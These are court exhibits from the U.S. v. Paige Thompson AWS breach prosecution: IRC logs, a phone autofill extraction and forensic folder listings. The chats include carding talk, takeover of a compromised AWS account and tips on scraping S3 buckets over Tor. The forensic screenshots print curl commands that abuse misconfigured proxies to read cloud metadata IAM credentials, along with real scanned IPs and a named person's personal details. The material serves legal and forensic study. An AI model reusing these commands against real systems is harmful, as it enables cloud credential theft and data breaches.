# APPENDIX A

# EXHIBIT 455

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ #netcrave

lder

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-05-06.log | 5/6/2019 2:47 PM | Text Document | 19 KB |
| 2019-05-07.log | 5/7/2019 4:25 PM | Text Document | 2 KB |
| 2019-05-08.log | 5/8/2019 1:15 PM | Text Document | 2 KB |
| 2019-05-09.log | 5/9/2019 10:42 AM | Text Document | 9 KB |
| 2019-05-10.log | 5/10/2019 10:13 AM | Text Document | 1 KB |
| 2019-05-11.log | 5/11/2019 3:21 PM | Text Document | 1 KB |
| 2019-05-12.log | 5/11/2019 10:51 PM | Text Document | 1 KB |
| 2019-05-13.log | 5/13/2019 4:51 PM | Text Document | 1 KB |
| 2019-05-14.log | 5/14/2019 12:07 AM | Text Document | 1 KB |
| 2019-05-15.log | 5/15/2019 8:31 AM | Text Document | 1 KB |
| 2019-05-16.log | 5/16/2019 8:43 AM | Text Document | 1 KB |
| 2019-05-18.log | 5/18/2019 2:06 AM | Text Document | 1 KB |
| 2019-05-20.log | 5/20/2019 12:08 PM | Text Document | 1 KB |
| 2019-05-21.log | 5/20/2019 5:30 PM | Text Document | 1 KB |
| 2019-05-23.log | 5/23/2019 9:14 AM | Text Document | 1 KB |
| 2019-05-24.log | 5/24/2019 3:14 PM | Text Document | 1 KB |
| 2019-05-25.log | 5/25/2019 3:30 PM | Text Document | 5 KB |
| 2019-05-27.log | 5/27/2019 11:10 AM | Text Document | 2 KB |
| 2019-05-28.log | 5/28/2019 8:23 AM | Text Document | 5 KB |
| 2019-05-29.log | 5/29/2019 3:07 PM | Text Document | 1 KB |
| 2019-05-30.log | 5/30/2019 1:49 PM | Text Document | 2 KB |
| 2019-05-31.log | 5/31/2019 5:27 AM | Text Document | 1 KB |
| 2019-06-01.log | 5/31/2019 6:48 PM | Text Document | 1 KB |
| 2019-06-02.log | 6/2/2019 2:46 PM | Text Document | 1 KB |
| 2019-06-03.log | 6/3/2019 5:58 AM | Text Document | 1 KB |
| 2019-06-04.log | 6/4/2019 8:42 AM | Text Document | 5 KB |
| 2019-06-05.log | 6/5/2019 10:49 AM | Text Document | 24 KB |
| 2019-06-06.log | 6/6/2019 9:07 AM | Text Document | 1 KB |
| 2019-06-07.log | 6/6/2019 11:20 PM | Text Document | 1 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 455
Admitted__________________

2019-06-05.log

```
[07:27:49] <erratic> I'll prob fuck with it later, like I said last night, so much shit, so much. not enough time.
[07:30:27] <erratic> I dunno my friend said something to me awhile back thats got me thinking about carding alot lately
[07:30:47] <erratic> Luhn algorithm shit
[07:31:01] <erratic> and other issuance characteristics
[07:37:30] <erratic> evidently he's got a mag track writer
[07:37:47] <erratic> and emboss kits
[07:37:57] <erratic> and a lot of other shit
[07:38:28] <erratic> a poor ass white girl like me need those
[07:38:33] <erratic> to go shopping
```

2019-06-05.log

```
[07:53:40] <erratic> aws --profile astem iam create-login-profile --cli-input-json file://create-login-profile.json
[07:53:43] <erratic> {
[07:53:46] <erratic>     "LoginProfile": {
[07:53:48] <erratic>         "UserName": "default",
[07:53:51] <erratic>         "CreateDate": "2019-06-05T07:52:15Z",
[07:53:53] <erratic>         "PasswordResetRequired": false
[07:53:56] <erratic>     }
[07:53:58] <erratic> }
[07:54:01] <erratic> aws sts get-caller-identity --profile astem
[07:54:03] <erratic> { "UserId": "AIDAU55F6ZVKSUXFH4SMH", "Account": "          4197", "Arn": "arn:aws:iam::          4197:user/default"
[07:54:06] <erratic> }
[07:54:09] <erratic> heh heh heh heh heh
[07:54:11] <erratic> gottem
[07:54:14] <erratic> smells like bacon
[07:54:28] <erratic> anyone want a domain?
[07:54:44] <erratic> how about a storage gateway :D
[07:59:27] <erratic> how about... a big fat db.r4.large dump
[07:59:51] <erratic> hugedumps.com
```

2019-06-05.log

```
[10:01:52] <erratic> I think if we all worked together we could turn a substantial number of the internet's rogue bots into our own outlet that would finance our projects
[10:02:36] <erratic> I do it all the time
[10:02:42] <erratic> just think of what we could do collectively
[10:03:34] <erratic> as long as we dont get much bigger of a group than we are now
[10:04:25] <erratic> I'm pretty careless but I'm careless because nobody gives a fuck
[10:04:33] <erratic> but I could stand to be less careless
[10:05:09] <erratic> seriously like
[10:05:13] <erratic> the shit I've done
[10:05:27] <erratic> way worse than what adrian lamo got arrested for initially
[10:05:41] <erratic> and that guy made his whole fucking career off being a scene whore
[10:05:53] <erratic> RIP adrian
```

# EXHIBIT 461



IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ EFNet ▸ nance
Name
Date modified
Type
2019-07-16.log
7/16/2019 9:07 AM
Text Document

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 461
Admitted____________________

2019-07-16.log

```
[11:40:47] <erratic> you'll have to apt-get install tor and proxychains ..
[11:40:50] <erratic> and aws-cli
[11:41:12] <erratic> then you can verify it with `aws sts get-caller-identity`
[11:41:30] <erratic> but you'll wanna do something like
[11:41:40] <erratic> alias aws="proxychains4 aws"
[11:41:48] <erratic> so that it gets torified
[11:42:03] <nance> Neat!
[11:42:28] <erratic> https://termbin.com/3qn7 proxychains.conf if you need it
[11:43:13] <erratic> yeah aws is great, except when someone steals your IAM instance profile that has full access to the acount :)
[11:43:58] <erratic> you may have to edit torrc to get it to work right
[11:44:00] <erratic> sec
[11:44:53] <erratic> yeah I dont have anything special in mine so i think all you gotta do is apt-get install tor && systemctl enable tor && systemctl start tor
[11:46:17] <erratic> if you wanted to scrape somebodys s3 buckets you can do ..

[11:47:10] <erratic> run that in a directory like scrapes and also change the name phillips to whatever you want, I usually use the company name that owns the account...
[11:47:32] <erratic> lolz
[11:47:48] <erratic> yeah you'll need jq (apt-get install jq) for that
[11:47:59] <erratic> also gnu parallel (apt-get install parallel)
[11:48:57] <erratic> I would actually not rely on alias aws="proxychains4 aws" for that and rather change the two usages of aws in that 1 liner to proxychains4 aws explicitly because the environment forks and it doesn't copy the parent unlessyou have set -a or something
[11:50:33] <erratic> that will straight up mirror all of an accounts s3 buckets though which you'll wanna make sure you have the diskspace for
[11:51:25] <nance> Interesting. I'll have to read thru this more when I get to a proper terminal
[11:51:30] <nance> Phone irc sucks
[11:51:32] <erratic> but yeah if you just wanna use it to learn how to do some shit with aws go for it its not my shit lol
[11:51:38] <erratic> no worries :)
[11:52:07] <nance> I just legit need to learn AWS and s3 for work lol
[11:52:30] <nance> Make the jr dev ops dudes feel threatened
[11:53:48] <erratic> definitely yeah go for it if you wanna use that account for practice, should be fine if you use tor even without Ive fucked with a lot of aws accounts from my own address because most people don't have a fucking clue how to use logging
```

# EXHIBIT 506



# Extraction Report
Apple iPhone

## Autofill (36)

| Details | | Deleted |
|---|---|---|
| **cardNumber:** 12726229<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:58:42 AM(UTC-7) | |
| **cardNumber:** 12726229<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:58:42 AM(UTC-7) | |
| **j_username:** josephbaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:57:19 AM(UTC-7) | |
| **j_username:** josephbaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:57:19 AM(UTC-7) | |
| **username:** josephbaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** josephbaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:45 AM(UTC-7) | |
| **username:** joseph.baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:39 AM(UTC-7) | |
| **username:** joseph.baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:39 AM(UTC-7) | |
| **answer:** pizza<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:12 AM(UTC-7) | |
| **answer:** pizza<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:12 AM(UTC-7) | |
| **username:** joeybaleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:56:12 AM(UTC-7) | |
| **dobDay:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobDay:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingZipCodePrefix:** 98109<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobYear:** 1991<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **middleName:** A<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **emailAddress:** josephbaleda@mailinator.com<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line2:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 506
Admitted____________________

| | | |
|---|---|---|
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **lastName:** Baleda<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **dobMonth:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **firstName:** Joseph<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.line1:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberAreaCode:** 425<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberSuffix:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **homePhoneNumberPrefix:**<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |
| **mailingAddress.city:** Seattle<br>**Source:** Chrome | **Timestamp:** 3/28/2019 2:54:17 AM(UTC-7) | |

# EXHIBIT 643



1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan\metadata_old4

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| . = metadata_old4 (570,728) | existing | | 2.2 GB | 07/10/2019 10:18... | 05/29/2019 00:49... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,501... |
| 99.81.8.247:80 | existing | 247:80 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.8.247:443 | existing | 247:443 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.6.133:443 | existing, already viewed | html | 10.9 KB | 07/10/2019 10:19... | 03/27/2019 21:51... | 07/19/2019 06:24... | Crwxrwxrwx | 40,880,352 |
| 99.81.5.92:443 | existing, already viewed | json | 249 B | 07/10/2019 10:19... | 03/27/2019 08:02... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,86... |
| 99.81.5.220:80 | existing, already viewed | html | 218 B | 07/10/2019 10:19... | 03/27/2019 10:38... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.3.36:80 | existing, already viewed | html | 214 B | 07/10/2019 10:19... | 03/28/2019 05:32... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,02... |
| 99.81.16.147:443 | existing | 147:443 | 1.0 KB | 07/10/2019 10:19... | 03/28/2019 10:09... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,03... |
| 99.81.1.198:443 | existing | 198:443 | 249 B | 07/10/2019 10:18... | 03/26/2019 09:44... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,808... |
| 99.81.1.185:80 | existing | 185:80 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.185:443 | existing | 185:443 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.156:80 | existing | 156:80 | 169 B | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.1.156:443 | existing | 156:443 | 0.7 KB | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.0.229:443 | existing | 229:443 | 249 B | 07/10/2019 10:18... | 03/27/2019 00:19... | 07/19/2019 06:24... | rwxrwxrwx | 7,393,375... |
| 99.80.99.169:80 | existing | 169:80 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.99.169:443 | existing | 169:443 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.98.91:443 | existing, already viewed | 91:443 | 0 B | 07/10/2019 10:19... | 03/27/2019 11:27... | 07/19/2019 06:24... | rwxrwxrwx | 11,302,60... |
| 99.80.98.57:80 | existing | 57:80 | 214 B | 07/10/2019 10:19... | 03/27/2019 17:19... | 07/19/2019 06:24... | rwxrwxrwx | 11,669,64... |

Partition File Preview Details Gallery Calendar Legend Raw Text

# Not Found

The requested URL /latest/meta-data was not found on this server.

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 643
Admitted________________



1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan\metadata_old4

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| . = metadata_old4 (570,728) | existing | | 2.2 GB | 07/10/2019 10:18... | 05/29/2019 00:49... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,501... |
| 99.81.8.247:80 | existing | 247:80 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.8.247:443 | existing | 247:443 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.6.133:443 | existing, already viewed | html | 10.9 KB | 07/10/2019 10:19... | 03/27/2019 21:51... | 07/19/2019 06:24... | Crwxrwxrwx | 40,880,352 |
| 99.81.5.92:443 | existing, already viewed | json | 249 B | 07/10/2019 10:19... | 03/27/2019 08:02... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,86... |
| 99.81.5.220:80 | existing, already viewed | html | 218 B | 07/10/2019 10:19... | 03/27/2019 10:38... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.3.36:80 | existing | html | 214 B | 07/10/2019 10:19... | 03/28/2019 05:32... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,02... |
| 99.81.16.147:443 | existing | 147:443 | 1.0 KB | 07/10/2019 10:19... | 03/28/2019 10:09... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,03... |
| 99.81.1.198:443 | existing | 198:443 | 249 B | 07/10/2019 10:18... | 03/26/2019 09:44... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,808... |
| 99.81.1.185:80 | existing | 185:80 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.185:443 | existing | 185:443 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.156:80 | existing | 156:80 | 169 B | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.1.156:443 | existing | 156:443 | 0.7 KB | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.0.229:443 | existing | 229:443 | 249 B | 07/10/2019 10:18... | 03/27/2019 00:19... | 07/19/2019 06:24... | rwxrwxrwx | 7,393,375... |
| 99.80.99.169:80 | existing | 169:80 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.99.169:443 | existing | 169:443 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.98.91:443 | existing, already viewed | 91:443 | 0 B | 07/10/2019 10:19... | 03/27/2019 11:27... | 07/19/2019 06:24... | rwxrwxrwx | 11,302,60... |
| 99.80.98.57:80 | existing | 57:80 | 214 B | 07/10/2019 10:19... | 03/27/2019 17:19... | 07/19/2019 06:24... | rwxrwxrwx | 11,669,64... |

Partition File Preview Details Gallery Calendar Legend Raw Text

# Forbidden

You don't have permission to access /latest/meta-data on this server.

X-Ways Forensics: 1B52-md126-results - [1b52-md126-luksopen, Volume]
\home\erratic\aws_hacking_shit\aws_scan\ami-id.tar
49 files, 1 dir.
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
Selected: 1 file (298 B)

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = aws_hacking_shit (5,549,429) | existing | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxrwx | 7,044,587... |
| . = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| scan.log4 | existing | log4 | 39 B | 07/10/2019 10:17... | 04/13/2019 17:17... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| run.sh | existing, already viewed | sh | 293 B | 07/10/2019 10:17... | 04/03/2019 13:45... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| README | existing, already viewed | ascii_u... | 326 B | 07/10/2019 10:16... | 03/22/2019 01:23... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| prescan.sh | existing, already viewed | sh | 416 B | 07/10/2019 10:16... | 04/06/2019 17:53... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| ports.txt | existing | txt | 96 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,672... |
| pass | existing | | 17 B | 07/10/2019 10:19... | 03/14/2019 07:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,07... |
| new_all2.xz | existing, already viewed | xz | 28.1 MB | 07/10/2019 10:16... | 04/06/2019 16:33... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... |
| new_all.xz | existing | xz | 141 MB | 07/10/2019 10:16... | 03/19/2019 00:58... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,617... |
| new-ec2-credentials-describe-instances | existing, already viewed | json | 115 KB | 07/10/2019 10:16... | 03/04/2019 10:08... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,328 |
| nano | existing, already viewed | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,709... |
| miner.tar | existing | tar | 13.4 MB | 07/10/2019 10:17... | 04/04/2019 15:42... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,832 |
| metadata_to_date_03_19_19 | existing | | 29.7 KB | 07/10/2019 10:16... | 03/19/2019 04:35... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,424 |
| metadata.scanner.joblog | existing | tsv | 1.1 GB | 07/10/2019 10:17... | 03/14/2019 17:30... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,008 |
| mega_metadata.txt | existing, already viewed | txt | 46.6 KB | 07/10/2019 10:17... | 04/02/2019 07:40... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,808 |
| limits.conf | existing | ascii_u... | 268 B | 07/10/2019 10:16... | 04/06/2019 18:05... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| ip-ranges.json | existing, already viewed | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,368 |
| infobloxctodockerstuff.sh | existing | sh | 4.4 KB | 07/10/2019 10:17... | 03/14/2019 08:25... | 07/19/2019 06:24... | Crwxrwxrwx | 28,331,680 |

Partition File Preview Details Gallery Calendar Legend Raw Text

../metadata_old4/52.74.60.204:443:ami-id
../metadata_old4/3.83.242.169:443:ami-id
../metadata_old4/52.210.225.235:443:ami-id
../metadata_old4/54.214.50.238:443:ami-id
../metadata_old4/34.205.178.115:80:ami-id
../metadata_old4/18.209.225.93:80:ami-id
../metadata_old4/34.213.27.38:443:ami-id
../metadata_old4/52.196.76.216:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/13.113.12.133:80:ami-id
../metadata_old4/52.208.97.11:443:ami-id
../metadata_old4/34.242.245.102:443:ami-id
../metadata_old4/52.86.111.16:80:ami-id
../metadata_old4/54.162.202.98:443:ami-id
../metadata_old4/18.209.2.12:443:ami-id
../metadata_old4/52.90.137.8:80:ami-id
../metadata_old4/13.57.7.185:80:ami-id
../metadata_old4/34.201.163.169:443:ami-id
../metadata_old4/34.197.128.100:443:ami-id
../metadata_old4/35.154.251.51:443:ami-id
../metadata_old4/54.174.65.134:80:ami-id
../metadata_old4/13.229.149.238:443:ami-id
../metadata_old4/100.25.211.127:80:ami-id
../metadata_old4/52.31.8.36:443:ami-id
../metadata_old4/184.72.249.27:443:ami-id
../metadata_old4/100.26.57.181:80:ami-id
../metadata_old4/52.64.104.205:443:ami-id
../metadata_old4/52.66.77.130:443:ami-id
../metadata_old4/174.129.17.248:443:ami-id
../metadata_old4/54.207.9.93:443:ami-id
../metadata_old4/52.59.195.80:443:ami-id
../metadata_old4/52.18.89.222:443:ami-id
../metadata_old4/52.202.171.240:443:ami-id
../metadata_old4/52.52.171.1:443:ami-id
../metadata_old4/52.29.7.60:443:ami-id
../metadata_old4/34.204.166.231:443:ami-id
../metadata_old4/35.168.25.243:443:ami-id
../metadata_old4/54.156.183.45:80:ami-id
../metadata_old4/3.89.177.190:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/54.72.195.241:443:ami-id

mega_metadata.txt

```
34.203.227.201:443:ami-id
54.255.226.147:443:ami-id
13.228.13.116:443:ami-id
52.50.114.108:443:ami-id
54.194.234.17:443:ami-id
35.174.95.137:80:ami-id
52.55.150.227:443:ami-id
3.80.135.207:80:ami-id
52.213.221.16:443:ami-id
13.232.74.206:80:ami-id
34.233.5.227:80:ami-id
34.233.5.227:443:ami-id
13.251.122.190:443:ami-id
35.168.232.110:443:ami-id
54.223.175.32:443:ami-id
18.130.245.251:443:ami-id
63.32.127.100:443:ami-id
3.83.242.169:80:ami-id
18.130.169.121:443:ami-id
54.77.46.101:443:ami-id
34.253.221.101:443:ami-id
3.87.29.227:80:ami-id
35.174.208.165:80:ami-id
54.233.188.211:80:ami-id
52.5.19.114:443:ami-id
35.168.208.144:80:ami-id
35.168.208.144:443:ami-id
13.233.31.108:80:ami-id
18.231.94.56:443:ami-id
18.205.47.75:443:ami-id
54.232.231.134:443:ami-id
3.120.251.179:80:ami-id
52.57.128.255:443:ami-id
35.157.22.118:443:ami-id
52.210.225.235:443:ami-id
18.184.143.8:443:ami-id
18.195.209.161:443:ami-id
54.85.167.138:443:ami-id
52.208.25.41:443:ami-id
35.162.65.136:443:ami-id
../metadata_old2/18.207.213.8.metadata.8888:ami-id
../metadata_old2/13.233.67.216.metadata.443:ami-id
../metadata_old2/23.22.9.234.metadata.80:ami-id
../metadata_old2/122.248.238.156.metadata.443:ami-id
../metadata_old2/52.91.2.197.metadata.443:ami-id
../metadata_old2/52.199.114.150.metadata.8001:ami-id
../metadata_old2/54.162.202.98.metadata.80:ami-id
../metadata_old2/52.207.132.15.metadata.443:ami-id
../metadata_old2/35.174.95.137.metadata.80:ami-id
../metadata_old2/34.245.86.161.metadata.8888:ami-id
../metadata_old2/52.20.131.53.metadata.443:ami-id
../metadata_old2/34.213.27.38.metadata.443:ami-id
../metadata_old2/54.238.181.176.metadata.80:ami-id
../metadata_old2/52.4.234.164.metadata.443:ami-id
../metadata_old2/54.218.1.67.metadata.443:ami-id
../metadata_old2/54.189.245.163.metadata.443:ami-id
../metadata_old2/54.252.210.83.metadata.81:ami-id
../metadata_old2/54.214.50.238.metadata.443:ami-id
../metadata_old2/34.203.219.137.metadata.443:ami-id
../metadata_old2/54.89.239.139.metadata.3128:ami-id
../metadata_old2/3.104.89.98.metadata.443:ami-id
../metadata_old2/52.193.82.153.metadata.3128:ami-id
../metadata_old2/35.161.229.177.metadata.3128:ami-id
```

X-Ways Forensics: 1B52-md126-results - [1b52-md126-luksopen, Volume]
File Edit Search Navigation View Tools Specialist Options Window Help
1b52-md126-luksopen, Vol...
\home\erratic\aws_hacking_shit\aws_scan
83 files (83), 17 dir.
Name Description Type Size Created Modified Record changed Attr. 1st sector Metadata Device type
docker.sh
pass
events.pcap
csp.redirect.server.ec2.tags
csp.redirect.server.ec2.user-data
14-03-19.non443.log
ajaykanthei
14-03.19
cicd-instance.us-west-2.ec2.instances
cicd-instance.us-west-1.ec2.instances
cicd-instance.us-east-2.ec2.instances
cicd-instance.us-east-1.ec2.instances
54.164.114.241.binary.user-data
11-3-19.non443.log
11-3-19.443.log
11-3-19
9-3-19.non443.log
9-03-19.443.log
9-3-19
nano
astem.newuser
astem.role.sshkey
astem-role
convox-us-east-1.ec2
tmp3
tmp2
tmp
ec2_run_instance.sh
7-03-19.443.log
7-03-19.non443.log
7-03-19
fuseos-dev-compute.ec2_instances.us-east-1
new-ec2-credentials-describe-instances
another_ec2_instance_role
ami-id.tar
https_ports.txt
ports.txt
all_shuf.xz
spool.sh
ip-ranges.json
deploy.sh
Partition File Preview Details Gallery Calendar Legend Raw Text
Selected: 1 file (83.5 KB)
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.214.25.54:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.197.205:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.161.88:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.236.16.20:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.62.80.179:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://176.34.104.30:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.59.28.187:8443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.196.146.101:443 http://169.254.169.254/latest/meta-data/iam/info
{
"Code" : "Success",
"LastUpdated" : "2019-03-08T04:04:13Z",
"InstanceProfileArn" : "arn:aws:iam:: instance-profile
"InstanceProfileId" :
}curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.215.158:443 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443 http://169.254.169.254/latest/meta-data/iam/info
{
\1b52-md126-luksopen, Volume\home\erratic\aws_hacking_shit\aws_scan\7-03-19.443.log
Left and right mouse buttons to rotate, middle mouse button to mirror, with Shift to flip

643-006

X-Ways Forensics: 1B52-md126-results - [1b52-md126-luksopen, Volume]
\home\erratic\aws_hacking_shit\aws_scan
83 files
docker.sh
